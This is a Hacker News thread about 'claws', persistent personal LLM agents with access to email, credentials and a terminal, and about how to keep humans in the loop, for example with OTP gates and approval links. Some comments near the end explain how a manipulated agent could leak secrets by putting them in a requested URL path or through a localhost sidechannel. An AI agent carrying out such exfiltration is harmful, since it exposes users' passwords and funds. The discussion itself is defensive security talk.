Claws are now a new layer on top of LLM agents

89 points by Cyphase 19 hours ago

https://xcancel.com/karpathy/status/2024987174077432126

All: quite a few comments in this thread (and another one we merged hither - https://news.ycombinator.com/item?id=47099160) have contained personal attacks. Hopefully most of them are [flagged] and/or [dead] now.

On HN, please do not cross into personal attack no matter how strongly you feel about someone or disagree with them. It's destructive of what the site is for, and we moderate and/or ban accounts that do it.

If you haven't recently, please review https://news.ycombinator.com/newsguidelines.html and make sure that you're using the site as intended when posting here.

jameslk - an hour ago

One safety pattern I’m baking into CLI tools meant for agents: Anytime an agent could do something very bad, like email blast too many people, CLI tools now require a one-time password

The tool tells the agent to ask the user for it, and the agent cannot proceed without it. The instructions from the tool show an all caps message explaining the risk and telling the agent that they must prompt the user for the OTP

I haven't used any of the *Claws yet, but this seems like an essential poor man's human-in-the-loop implementation that may help prevent some pain

I prefer to make my own agent CLIs for everything for reasons like this and many others to fully control aspects of what the tool may do and to make them more useful

aqme28 - 40 minutes ago

How do you enforce this? You have a system where the agent can email people, but cannot email "too many people" without a password?
- jameslk - 18 minutes ago
  
  It's not a perfect security model. Between the friction and all caps instructions the model sees, it's a balance between risk and simplicity. There's ways I can imagine the concept can be hardened, e.g. with a server layer in between that checks for things like dangerous actions or enforces rate limiting
  - chongli - 12 minutes ago
    
    What if instead of allowing the agent to act directly, it writes a simple high-level recipe or script that you can accept (and run) or reject? It should be very high level and declarative, but with the ability to drill down on each of the steps to see what's going on under the covers?
ZitchDog - 27 minutes ago

I've created my own "claw" running in fly.io with a pattern that seems to work well. I have MCP tools for actions that I want to ensure human-in-the loop - email sending, slack message sending, etc. I call these "activities". The only way for my claw to execute these commands is to create an activity which generates a link with the summary of the acitvity for me to approve.
- good-idea - 8 minutes ago
  
  Any chance you have a repo to share?
IMTDb - 22 minutes ago

So human become just a provider of those 6 digits code ? That’s already the main problem i have with most agents: I want them to perform a very easy task: « fetch all recepts from website x,y and z and upload them to the correct expense of my expense tracking tool ». Ai are perfectly capable of performing this. But because every website requires sso + 2 fa, without any possibility to remove this, so i effectively have to watch them do it and my whole existence can be summarized as: « look at your phone and input the 6 digits ».
The thing i want ai to be able to do on my behalf is manage those 2fa steps; not add some.

daxfohl - an hour ago

I wonder how the internet would have been different if claws had existed beforehand.

I keep thinking something simpler like Gopher (an early 90's web protocol) might have been sufficient / optimal, with little need to evolve into HTML or REST since the agents might be better able to navigate step-by-step menus and questionnaires, rather than RPCs meant to support GUIs and apps, especially for LLMs with smaller contexts that couldn't reliably parse a whole API doc. I wonder if things will start heading more in that direction as user-side agents become the more common way to interact with things.

amelius - an hour ago

Can't we rename "Claws" -> "Personal assistants"?

OpenClaw is a stupid name. Even "OpenSlave" would be a better fit.

notepad0x90 - an hour ago

How about "Open Assistants"? "OpenAss" for short?
- aidos - 37 minutes ago
  
  Sudden flashbacks to when I was trying to figure out why there was so much traffic to a blog post (15+ years ago).
  I guess the internet was looking for something different to my “kick-[ass open]-source software”.
- mystifyingpoi - 37 minutes ago
  
  I like that, this name tells you all about the security implications. Like, your user data could be penetrated.
- gaigalas - 8 minutes ago
  
  Just casual trivia:
  One of the contemporaneous competitors to jQuery was called "DOMAss".
  https://robertnyman.com/2007/03/02/domass-renamed-to-domassi...
- amelius - 32 minutes ago
  
  OpenClown.
dragonwriter - an hour ago

"Personal assistant” already has enough uses (both a narrower literal definition and a broader metaphorical definition applying to tools which includes but is not limited to what "claws" refers to) that using it probably makes communication more confusing rather than more clear. I don't think “claws” is a great name, but it does have the desirable trait of not already being heavily overloaded in a way that would promote confusion in the domain of application.
saaaaaam - an hour ago

I think claws is a great name. They let the AI go grab things. They snap away and get stuff done. Claws are powerful and everything that has claws is cool.
Some of this may be slightly satirical.
(But I still think “claws” works better than “personal assistant” which anthropomorphises the technology too much.)
- amelius - an hour ago
  
  You mean "grab things in the digital world?" Like virtual things?
- aydyn - 43 minutes ago
  
  Claws are also potentially dangerous so it is a pretty apt analogy.
copperx - an hour ago

Stupid name? sure, but there's no point in fighting it. Claws is a sticky name.
AnimalMuppet - an hour ago

"OpenClanker"?
esseph - 41 minutes ago

> OpenSlave" would be a better fit.
Wow. Can we please not?
- kibwen - 19 minutes ago
  
  Let's not dance around the issue.
  It's clear that the reason that the VC class are so frothing-at-the-mouth at the potential of LLMs is because they see slavery as the ideal. They don't want employees. They want perfectly subservient, perfectly servile automatons. The whole point of the AI craze is that slavery is the goal.
- wormpilled - 26 minutes ago
  
  Wow, just wow. Please don't kink-shame.
refsys - an hour ago

[dead]
misweencoded - an hour ago

[dead]
thousand_nights - an hour ago

fr idg this obsession with lobsters/molting/claws/shrimps it feels like i'm going insane

ianbutler - 15 minutes ago

I'm not sure I like this trend of taking the first slightly hypey app in an existing space and then defining the nomenclature of the space relative to that app, in this case even suggesting it's another layer of the stack.

It implies an ubiquity that just isn't there (yet) so it feels unearned and premature in my mind. It seems better for social media narratives more than anything.

I'll admit I don't hate the term claws I just think it's early. Like Bandaid had much more perfusion and mindshare before it became a general term for anything as an example.

I also think this then has an unintended chilling effect in innovation because people get warned off if they think a space is closed to taking different shapes.

At the end of the day I don't think we've begun to see what shapes all of this stuff will take. I do kind of get a point of having a way to talk about it as it's shaping though. Idk things do be hard and rapidly changing.

hmokiguess - 4 hours ago

Are these things actually useful or do we have an epidemic of loneliness and a deep need for vanity AI happening?

I say this because I can’t bring myself to finding a use case for it other than a toy that gets boring fast.

One example in some repos around scheduling capabilities mentions “open these things and summarize them for me” this feels like spam and noise not value.

A while back we had a trending tweet about wanting AI to do your dishes for you and not replace creativity, I guess this feels like an attempt to go there but to me it’s the wrong implementation.

simonw - 4 hours ago

I don't have a Claw running right now and I wish I did. I want to start archiving the livestream from https://www.youtube.com/watch?v=BfGL7A2YgUY - YouTube only provide access to the last 12 hours. If I had a Claw on a 24/7 machine somewhere I could message it and say "permanent archive this stream" and it would figure it out and do it.
- btouellette - 4 hours ago
  
  Not a great use case for Claw really. I'm sure ChatGPT can one shot a Python script to do this with yt-dlp and give you instructions on how to set it up as a service
  - Barbing - 2 hours ago
    
    ChatGPT can do it w/o draining your bank account etc. I’d agree…
    But for speed only, I think it’s “your idea but worse” when the steps include something AND instructions on how to do something else. The Signal/Telegram bot will handle it E2E (maybe using a ton more tokens than a webchat but fast). If I’m not mistaken.
  - simonw - 4 hours ago
    
    You've gotta run it somewhere though - that's the harder part.
    
    enraged_camel - 3 hours ago
    
    Not to mention, the whole point is to not end up with a bunch of one-off Python scripts for every little thing that occurs to you, right?
    
    jmholla - 16 minutes ago
    
    Why not? Why not have your agent write and automate those one off scripts instead of burning tokens on repeated actions?
  - qudat - 4 hours ago
    
    I mean that’s sort of where I think this all will land. Use something like happy cli to connect to CC in a workspace directory where it can generate scripts, markdown files, and systemd unit files. I don’t see why you’d need more than that.
    That cuts 500k LoC from the stack and leverages a frontier tool like CC
    
    kzahel - an hour ago
    
    We think alike!
    https://github.com/kzahel/claw-starter
    Systemd basic script + markdown + (bring whatever agent CLI)
    That's I think basically what you describe. I've been using it for the past two days it's very very basic but it's a I think it gives you everything you actually need sort of the minimal open claw without a custom harness and 5k loc or 50k or w/e. The cool thing is that it can just grow naturally and you can audit as it grows
    
    hmokiguess - 3 hours ago
    
    Yeah that’s a good point. I use a fork of https://github.com/tiann/hapi with Tailscale for this very reason and it works well
- esseph - 31 minutes ago
  
  This sounds like it would be better suited for a shell script.
- hmokiguess - 4 hours ago
  
  Yeah that fits the “do the dishes for me” thing, but do you still think the implementation behind it is the proper and best way to go about it?
  - simonw - 4 hours ago
    
    I don't, which is why I'm not running OpenClaw on the live internet right now. See also Andrej's original tweet.
- verdverm - 4 hours ago
  
  If you know the method already, why is cron insufficient? Why use a meat bag to message over cron? Is that the setup phase for a new stream?
  - hmokiguess - 4 hours ago
    
    This reminded me of a video I saw recently where someone mentioned that piracy is most often a service problem not a price problem. That back in the days people used torrents to get movies because they worked well and were better than searching for stuff at blockbuster, then, came Netflix, and they flocked to it and paid the premium for convenience without even thinking twice and piracy decreased.
    I think the analogy here holds, people are lazy, we have a service and UX problem with these tools right now, so convenience beats quality and control for the average Joe.
  - simonw - 4 hours ago
    
    I'd have to setup a new VPS, which is fiddly to do from a phone. If I had a Claw that piece would be solved already.
    Cron is also the perfect example of the kind of system I've been using for 20+ years where is still prefer to have an LLM configure it for me! Quick, off the top of your head what's the cron syntax for "run this at 8am and 4pm every day pacific time"?
    
    verdverm - 4 hours ago
    
    I took the "running 24/7” to imply less AI writes code once and more to imply AI is available all the time for ad hoc requests. I tried to adjust back to the median with my third question.
    I find the idea of programming from my phone unappealing, do you ever put work down? Or do you have to be always on now, being a thought leader / influencer?
    
    simonw - 3 hours ago
    
    I do most of my programming from my phone now. I love it. I get to spend more time out in the world and not chained to my laptop. I can work in the garden with the chickens, or take the dog on a walk, or use public transport time productively while going to fun places.
    It's actually the writing of content for my blog that chains me to the laptop, because I won't let AI write for me. I do get a lot of drafts and the occasional short post written in Apple Notes though.
    
    verdverm - 3 hours ago
    
    Going from ten finger typing to thumb only or voice has never panned out for me. Any tips?
    
    ProgrammerMatt - an hour ago
    
    I always want to know what the hell it is these people claim to be working on lmao.
    But seems like this guy is the real deal based on his post history
    
    verdverm - a minute ago
    
    Simon has a lot more smaller projects than one big project these days (afaik, so special insights), which are more conducive to this maybe?
    I always try to not use my phone when out and about, preferring to chat people up so we don't lose our IRL social skills. They are more interesting than whatever my phone might have to offer me in those moments.

throwaway13337 - 5 hours ago

The real big deal about 'claws' in that they're agents oriented around the user.

The kind of AI everyone hates is the stuff that is built into products. This is AI representing the company. It's a foreign invader in your space.

Claws are owned by you and are custom to you. You even name them.

It's the difference between R2D2 and a robot clone trying to sell you shit.

(I'm aware that the llms themselves aren't local but they operate locally and are branded/customized/controlled by the user)

1shooner - 6 minutes ago

I agree, and it seems like the incumbents in this user-oriented space (OS vendors) would be letting the messy, insecure version play out before making an earnest attempt at rolling it into their products.
luckylion - an hour ago

It always depends on who you consider the user. The one who initiated the agent, or the one who interacts with it? Is the latter a user or a victim?

nevertoolate - 7 hours ago

My summary: openclaw is a 5/5 security risk, if you have a perfectly audited nanoclaw or whatever it is 4/5 still. If it runs with human-in-the-loop it is much better, but the value is quickly diminishing. I think llms are not bad at helping to spec down human language and possibly doing great also in creating guardrails via tests, but i’d prefer something stable over llms running in “creative mode” or “claw” mode.

ollybrinkman - 27 minutes ago

The challenge with layering on top of LLM agents is payment — agents need to call external tools and services, but most APIs still require accounts and API keys that agents can't manage. The x402 standard (HTTP 402 + EIP-712 USDC signatures) solves this cleanly: agent holds a wallet, signs a micropayment per call, no account needed. Worth considering as a primitive for agent-to-agent commerce in these architectures.

daxfohl - 15 minutes ago

Could a malicious claw sidechannel this by creating a localhost service and calling that with the signed micropayment, to get the decrypted contents of the wallet or anything?

ZeroGravitas - 10 hours ago

So what is a "claw" exactly?

An ai that you let loose on your email etc?

And we run it in a container and use a local llm for "safety" but it has access to all our data and the web?

simonw - 5 hours ago

It's a new, dangerous and wildly popular shape of what I've in the past called a "personal digital assistant" - usually while writing about how hard it is to secure them from prompt injection attacks.
The term is in the process of being defined right now, but I think the key characteristics may be:
- Used by an individual. People have their own Claw (or Claws).
- Has access to a terminal that lets it write code and run tools.
- Can be prompted via various chat app integrations.
- Ability to run things on a schedule (it can edit its own frontal equivalent)
- Probably has access to the user's private data from various sources - calendars, email, files etc. very lethal trifecta.
Claws often run directly on consumer hardware, but that's not a requirement - you can host them on a VPS or pay someone to host them for you too (a brand new market.)
mattlondon - 10 hours ago

I think for me it is an agent that runs on some schedule, checks some sort of inbox (or not) and does things based on that. Optionally it has all of your credentials for email, PayPal, whatever so that it can do things on your behalf.
Basically cron-for-agents.
Before we had to go prompt an agent to do something right now but this allows them to be async, with more of a YOLO-outlook on permissions to use your creds, and a more permissive SI.
Not rocket science, but interesting.
- snovv_crash - 9 hours ago
  
  Cron would be for a polling model. You can also have an interrupts/events model that triggers it on incoming information (eg. new email, WhatsApp, incoming bank payments etc).
  I still don't see a way this wouldn't end up with my bank balance being sent to somewhere I didn't want.
  - bpicolo - 7 hours ago
    
    Don't give it write permissions?
    You could easily make human approval workflows for this stuff, where humans need to take any interesting action at the recommendation of the bot.
    
    wavemode - 6 hours ago
    
    The mere act of browsing the web is "write permissions". If I visit example.com/<my password>, I've now written my password into the web server logs of that site. So the only remaining question is whether I can be tricked/coerced into doing so.
    I do tend to think this risk is somewhat mitigated if you have a whitelist of allowed domains that the claw can make HTTP requests to. But I haven't seen many people doing this.
    
    gopher_space - 25 minutes ago
    
    I'm using something that pops up an OAuth window in the browser as needed. I think the general idea is that secrets are handled at the local harness level.
    From my limited understanding it seems like writing a little MCP server that defines domains and abilities might work as an additive filter.
    
    esafak - 6 hours ago
    
    Most web sites don't let you create service accounts; they're built for humans.
    
    dragonwriter - 43 minutes ago
    
    Many consumer websites intended for humans do let you create limited-privilege accounts that require approval from a master account for sensitive operations, but these are usually accounts for services that target families and the limited-privilege accounts are intended for children.
    
    dmoy - 2 hours ago
    
    Is this reply meant to be for a different comment?
    
    esafak - an hour ago
    
    No. I was trying to explain that providing web access shouldn't be tantamount to handing over the keys. You should be able to use sites and apps through a limited service account, but this requires them to be built with agents and authorization in mind. REST APIs often exist but are usually written with developers in mind. If agents are going to go maintstream, these APIs need to be more user friendly.
    
    jmholla - 18 minutes ago
    
    That's not what the parent comment was saying. They are pointing out that you can exfiltrate secret information by querying any web page with that secret information in the path. `curl www.google.com/my-bank-password`. Now, google logs have my bank password in them.